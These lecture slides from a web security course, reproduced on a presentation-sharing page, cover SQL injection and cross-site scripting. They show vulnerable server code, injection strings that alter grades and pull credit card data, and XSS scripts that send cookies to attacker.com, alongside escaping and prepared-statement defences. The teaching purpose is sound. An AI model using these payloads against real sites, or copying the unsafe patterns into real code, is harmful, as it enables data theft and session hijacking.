1 / 12

Unsafe Server Code

Unsafe Server Code. advisorName = params [:form][:advisor] students = Student.find_by_sql ( "SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = '" + advisorName + "'");. Typical query:.

nigel
Download Presentation

Unsafe Server Code

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( "SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = '" + advisorName + "'"); Typical query: SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones' Value from form field CS 142 Lecture Notes: Injection Attacks

  2. Injection Attack Enter the following in the "Advisor name" field: Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith Resulting query: SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith' CS 142 Lecture Notes: Injection Attacks

  3. Stealing Private Information CS 142 Lecture Notes: Injection Attacks

  4. Stealing Private Info, cont'd Server query code: month = params[:form][:month] orders = Orders.find_by_sql( "SELECT pizza, toppings, quantity, date " + "FROM orders " + "WHERE user_id=" + user_id + "AND order_month=" + month); What if "month" is: October AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as dateFROM credit_cards ' CS 142 Lecture Notes: Injection Attacks

  5. Resulting Query SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month=OctoberAND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards CS 142 Lecture Notes: Injection Attacks

  6. Resulting Query SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month=OctoberAND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards CS 142 Lecture Notes: Injection Attacks

  7. CardSystems Attack • CardSystems • Credit card payment processing company • SQL injection attack in June 2005 • The Attack • Credit card #s stored unencrypted • 263,000 credit card #s stolen from database • 43 million credit card #s exposed CS 142 Lecture Notes: Injection Attacks 7

  8. Let Rails Handle SQL Escaping Student.find_by_sql("SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = ?", params[:form][:advisor]) CS 142 Lecture Notes: Injection Attacks

  9. Prepared Statements PHP: $statement = odbc_prepare($connection, "SELECT * FROM students " . "WHERE advisor = ? AND gpa >= ?;"); odbc_execute($statement, array($advisor, $gpa)); Java: statement = connection.prepareStatement( "SELECT * FROM students " + "WHERE advisor = ? AND gpa >= ?;"); statement.setString(1, advisor); statement.setString(2, gpa); ResultSet rs = statement.executeQuery(); CS 142 Lecture Notes: Injection Attacks

  10. Stored XSS Attack Buggy server template: ... <div class="blogComment"> <%= @comment.message.html_safe%> </div> ... No escaping! Attacking blog entry: I agree completely with Alice ... <img style="display:none" id="cookieMonster"> <script> img= document.getElementById("cookieMonster"); img.src= "http://attacker.com?cookie=" + encodeURIComponent(document.cookie); </script> CS 142 Lecture Notes: Injection Attacks

  11. Reflected XSS Attack Buggy server template: ... <h1>Search Results</h1> Results for <%= params[:searchTerm].html_safe%> ... No escaping! Attacking search entry: Justin Bieber <img style="display:none" id="cookieMonster"> <script> img= document.getElementById("cookieMonster"); img.src= "http://attacker.com?cookie=" + encodeURIComponent(document.cookie); </script> CS 142 Lecture Notes: Injection Attacks

  12. CS 142 Lecture Notes: Cookies

More Related